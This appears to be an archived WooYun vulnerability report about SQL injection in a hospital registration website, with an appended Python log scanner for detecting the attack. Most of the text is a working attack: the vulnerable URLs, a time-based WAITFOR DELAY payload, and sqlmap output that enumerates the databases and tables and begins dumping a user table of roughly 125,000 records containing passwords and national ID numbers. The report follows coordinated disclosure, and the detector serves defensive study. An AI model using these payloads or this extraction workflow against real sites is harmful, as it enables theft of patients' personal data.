WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2015-12-10: Details reported to the vendor, awaiting vendor response
2015-12-14: Vendor has confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and relevant domain experts
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public
**.**.**.**
Name, national ID number and mobile number are required fields at registration.
Injection points:
http://**.**.**.**/zkHospital1.aspx?ID=ZK00000012
http://**.**.**.**/zxDoctorInformation.aspx?ID=6
http://**.**.**.**/zkClassCaseInfo.aspx?ID=1&Hospital=ZK00000001
http://**.**.**.**/zxQuestion.aspx?DoctorID=1
http://**.**.**.**/202/DoctInfo.aspx?ID=346
http://**.**.**.**/Order202.aspx?Dept_Name=
as an example:
Payload: ID=ZK00000012';WAITFOR DELAY '0:0:5'--
---
[09:17:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[09:17:15] [INFO] testing if current user is DBA
current user is DBA: True

Payload: ID=ZK00000012';WAITFOR DELAY '0:0:5'--
---
[09:09:40] [INFO] testing Microsoft SQL Server
[09:09:41] [INFO] confirming Microsoft SQL Server
[09:09:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2005
[09:09:43] [INFO] fetching database names
[09:09:43] [INFO] fetching number of databases
[09:09:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:09:43] [INFO] retrieved: 10
[09:09:47] [INFO] retrieved: Car
[09:09:59] [INFO] retrieved: demo
[09:10:20] [INFO] retrieved: master
[09:10:48] [INFO] retrieved: model
[09:11:17] [INFO] retrieved: msdb
[09:11:40] [INFO] retrieved: PLATFORM
[09:12:16] [INFO] retrieved: REPAIR
[09:12:40] [INFO] retrieved: tempdb
[09:13:14] [INFO] retrieved: XLIST
[09:13:41] [INFO] retrieved: YYGH
available databases [10]:
[*] Car
[*] demo
[*] master
[*] model
[*] msdb
[*] PLATFORM
[*] REPAIR
[*] tempdb
[*] XLIST
[*] YYGH
reg_user is the user registration table, with 125311 records.
Database: YYGH
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.IpAddress                  | 444969  |
| dbo.money_all                  | 179048  |
| dbo.reg_user                   | 125311  |
| dbo.Log                        | 62794   |
| dbo.R_PREREGISTER              | 41798   |
| dbo.user_reg                   | 28246   |
| dbo.money_add                  | 25609   |
| dbo.HintDetail                 | 13686   |
| dbo.HintDetail                 | 13686   |
| dbo.QuestionMoney              | 4276    |
| dbo.QuestionMoney              | 4276    |
| dbo.money_t                    | 2562    |
| dbo.YaoFang                    | 2516    |
| dbo.DoctTotal                  | 1018    |
| dbo.DoctInfo                   | 800     |
| dbo.JoinInHospital             | 672     |
| dbo.Memo                       | 480     |
| dbo.JoinInAD                   | 452     |
| dbo.SX_Save                    | 331     |
| dbo.HospitalPaiming            | 270     |
| dbo.ZK_Register                | 237     |
| dbo.LNZY_Log                   | 193     |
| dbo.LNZY_String                | 193     |
| dbo.ZK_ClassCase               | 135     |
| dbo.ZK_MediaReport             | 134     |
| dbo.ZK_AuthorityTechnology     | 131     |
| dbo.Code_Area                  | 129     |
| dbo.ZK_MedicalEquipment        | 122     |
| dbo.temp                       | 119     |
| dbo.LNZY_ScheduleInformation   | 118     |
| dbo.ZK_DoctorInformation       | 78      |
| dbo.MediaReport                | 73      |
| dbo.DiseaseBase                | 72      |
| dbo.DiseaseBase                | 72      |
| dbo.Advice                     | 43      |
| dbo.ZK_ImgNews                 | 40      |
| dbo.lock_user                  | 36      |
| dbo.Code_HosType               | 33      |
| dbo.DeptInfo                   | 32      |
| dbo.Code_Professional          | 24      |
| dbo.ZK_HospitalInformation     | 21      |
| dbo.HealthPressure             | 20      |
| dbo.ZK_DepartmentInformation   | 20      |
| dbo.DoctAdvice                 | 19      |
| dbo.HospitalHot                | 19      |
| dbo.ZK_Admin                   | 19      |
| dbo.ZK_TopicRead               | 17      |
| dbo.SMS                        | 15      |
| dbo.Code_ProfessionalType      | 14      |
| dbo.LNZY_DoctorInformation     | 14      |
| dbo.HealthGuide                | 13      |
| dbo.SX_Return                  | 12      |
| dbo.SX_Return                  | 12      |
| dbo.HospitalRank               | 11      |
| dbo.NewsDynamic                | 11      |
| dbo.NewsDynamic                | 11      |
| dbo.HealthHeart                | 10      |
| dbo.HospitalDynamic            | 10      |
| dbo.HospitalDynamic            | 10      |
| dbo.Code_HosLevel              | 9       |
| dbo.NewsQuestion               | 9       |
| dbo.JIBIE                      | 8       |
| dbo.ZK_Flash                   | 8       |
| dbo.Code_Education             | 7       |
| dbo.Code_Blood                 | 6       |
| dbo.Code_Job                   | 6       |
| dbo.Code_Admin                 | 5       |
| dbo.LNZY_DepartmentInformation | 5       |
| dbo.AdminUser                  | 4       |
| dbo.Code_Degree                | 4       |
| dbo.Code_Paper                 | 4       |
| dbo.Code_Practice              | 4       |
| dbo.Code_RH                    | 4       |
| dbo.Code_Sex                   | 4       |
| dbo.Code_Arrange               | 3       |
| dbo.Code_DeptLevel             | 3       |
| dbo.Code_DeptLevel             | 3       |
| dbo.Code_Level                 | 3       |
| dbo.system32                   | 3       |
| dbo.Health_Lecture             | 2       |
| dbo.Health_Memo                | 2       |
| dbo.Health_Record              | 2       |
| dbo.LNZY_PreRegister           | 2       |
| dbo.ZK_AdHistory               | 2       |
| dbo.ZK_AdHistory               | 2       |
| dbo.AdminHos                   | 1       |
| dbo.AdminHos                   | 1       |
| dbo.AdminHos                   | 1       |
| dbo.Health_Warning             | 1       |
| dbo.HealthLecture              | 1       |
| dbo.HealthWarning              | 1       |
| dbo.SerialNum                  | 1       |
+--------------------------------+---------+
Dumping data through
http://**.**.**.**/zkClassCaseInfo.aspx?Hospital=ZK00000001&ID=1
:
Payload: Hospital=ZK00000001';WAITFOR DELAY '0:0:5'--&ID=1
---
[10:54:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[10:54:04] [INFO] fetching columns for table 'reg_user' in database 'YYGH'
[10:54:04] [INFO] resumed: 25
[10:54:04] [INFO] resumed: answer
[10:54:04] [INFO] resumed: birthday
[10:54:04] [INFO] resumed: email
[10:54:04] [INFO] resumed: id
[10:54:04] [INFO] resumed: job
[10:54:04] [INFO] resumed: money
[10:54:04] [INFO] resumed: name
[10:54:04] [INFO] resumed: now
[10:54:04] [INFO] resumed: oldmoney
[10:54:04] [INFO] resumed: password
[10:54:04] [INFO] resumed: phone
[10:54:04] [INFO] resumed: postcode
[10:54:04] [INFO] resumed: question
[10:54:04] [INFO] resumed: sex
[10:54:04] [INFO] resumed: sf
[10:54:04] [INFO] resumed: sh
[10:54:04] [INFO] resumed: SMS
[10:54:04] [INFO] resumed: tel
[10:54:04] [INFO] resumed: tel1
[10:54:04] [INFO] resumed: username
[10:54:04] [INFO] resumed: vip
[10:54:04] [INFO] resumed: vipfy
[10:54:04] [INFO] resumed: viptime
[10:54:04] [INFO] resumed: WeiXin
[10:54:04] [INFO] resumed: ybk
[10:54:04] [INFO] fetching entries for table 'reg_user' in database 'YYGH'
[10:54:04] [INFO] fetching number of entries for table 'reg_user' in database 'YYGH'
[10:54:04] [INFO] resumed: 125484
[10:54:04] [INFO] fetching number of distinct values for column 'id'
[10:54:04] [INFO] resumed: 125482
[10:54:04] [INFO] fetching number of distinct values for column 'sf'
[10:54:04] [INFO] resumed: 122102
[10:54:04] [INFO] fetching number of distinct values for column 'sh'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'SMS'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'job'
[10:54:04] [INFO] resumed: 49213
[10:54:04] [INFO] fetching number of distinct values for column 'now'
[10:54:04] [INFO] resumed: 2364
[10:54:04] [INFO] fetching number of distinct values for column 'sex'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'tel'
[10:54:04] [INFO] resumed: 82234
[10:54:04] [INFO] fetching number of distinct values for column 'vip'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'ybk'
[10:54:04] [INFO] resumed: 2
[10:54:04] [INFO] fetching number of distinct values for column 'name'
[10:54:04] [INFO] resumed: 86120
[10:54:04] [INFO] fetching number of distinct values for column 'tel1'
[10:54:04] [INFO] resumed: 113967
[10:54:04] [INFO] fetching number of distinct values for column 'email'
[10:54:04] [INFO] resumed: 26924
[10:54:04] [INFO] fetching number of distinct values for column 'money'
[10:54:05] [INFO] resumed: 174
[10:54:05] [INFO] fetching number of distinct values for column 'phone'
[10:54:05] [INFO] resumed: 1
[10:54:05] [INFO] fetching number of distinct values for column 'vipfy'
[10:54:05] [INFO] resumed: 3
[10:54:05] [INFO] fetching number of distinct values for column 'WeiXin'
[10:54:05] [INFO] resumed: 2
[10:54:05] [INFO] fetching number of distinct values for column 'answer'
[10:54:05] [INFO] resumed: 43459
[10:54:05] [INFO] fetching number of distinct values for column 'viptime'
[10:54:05] [INFO] resumed: 806
[10:54:05] [INFO] fetching number of distinct values for column 'birthday'
[10:54:05] [INFO] resumed: 24755
[10:54:05] [INFO] fetching number of distinct values for column 'oldmoney'
[10:54:05] [INFO] resumed: 159
[10:54:05] [INFO] fetching number of distinct values for column 'password'
[10:54:05] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:54:05] [INFO] retrieved: 87403
[10:54:30] [INFO] fetching number of distinct values for column 'postcode'
[10:54:30] [INFO] retrieved: 3088
[10:55:02] [INFO] fetching number of distinct values for column 'question'
[10:55:02] [INFO] retrieved: 19866
[10:55:35] [INFO] fetching number of distinct values for column 'username'
[10:55:35] [INFO] retrieved: 125466
[10:56:01] [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows
[10:56:01] [INFO] retrieved: 10000
[10:57:00] [INFO] retrieved: [18-digit national ID number redacted in this copy]
[10:59:27] [INFO] retrieved: 1
[10:59:43] [INFO] retrieved: 0
[10:59:55] [INFO] retrieved:
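The two sqlmap runs above share one signature on the server side: a query-string value that closes a string literal and appends WAITFOR DELAY, followed by a response that takes about five seconds. The detector below, added here as an example and not part of the original report, scans constructed IIS W3C-style log lines (field order, IPs, user agents and the 4000 ms threshold are all assumptions) for that shape and marks requests where the delay actually took effect:

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C-style log lines (not from the report). Assumed field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status time-taken
SAMPLE_LOG = """\
2015-12-10 09:17:10 10.0.0.5 GET /zkHospital1.aspx ID=ZK00000012 203.0.113.7 Mozilla/5.0 200 38
2015-12-10 09:17:15 10.0.0.5 GET /zkHospital1.aspx ID=ZK00000012%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- 203.0.113.7 sqlmap/1.0 200 5041
2015-12-10 10:54:04 10.0.0.5 GET /zkClassCaseInfo.aspx Hospital=ZK00000001%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&ID=1 203.0.113.7 sqlmap/1.0 200 5019
2015-12-10 10:55:00 10.0.0.5 GET /zxQuestion.aspx DoctorID=1 198.51.100.4 Mozilla/5.0 200 41
"""

# WAITFOR DELAY is the MSSQL delay primitive seen in the report; the others cover other engines.
TIME_BASED = re.compile(r"\bwaitfor\s+delay\b|\bbenchmark\s*\(|\bpg_sleep\s*\(|\bsleep\s*\(", re.I)
STACKED = re.compile(r"'\s*;")  # closed string literal followed by a statement separator
SLOW_MS = 4000  # constructed threshold; a 5 s WAITFOR pushes time-taken to roughly 5000 ms


def inspect_query(query):
    """Return (param, reasons) for the first URL-decoded parameter that carries a payload."""
    for name, value in parse_qsl(query, keep_blank_values=True):
        reasons = []
        if TIME_BASED.search(value):
            reasons.append("time-delay primitive")
        if STACKED.search(value):
            reasons.append("stacked query after closed quote")
        if reasons:
            return name, reasons
    return None, []


def scan(log_text, slow_ms=SLOW_MS):
    """Flag requests carrying a delay payload; note when the server actually stalled."""
    findings = []
    for line in log_text.splitlines():
        f = line.split()  # assumes cs(User-Agent) contains no spaces
        if len(f) != 10:
            continue
        param, reasons = inspect_query(f[5])
        if not reasons:
            continue
        ms = int(f[9])
        if ms >= slow_ms:  # payload plus a matching delay: the injection executed
            reasons.append("response delayed %d ms" % ms)
        findings.append({"time": f[1], "client": f[6], "stem": f[4],
                         "param": param, "reasons": reasons})
    return findings
```

`scan(SAMPLE_LOG)` flags the two sqlmap requests (parameter `ID` on zkHospital1.aspx and `Hospital` on zkClassCaseInfo.aspx) with the delay confirmed, and leaves the two ordinary requests alone.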
It was far too slow, so I stopped here.
You are more professional than I am.
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-12-14 17:18
CNVD confirmed and reproduced the vulnerability as described; it has been forwarded via CNCERT to the Liaoning branch center, which will coordinate remediation with the website's operating unit.
None yet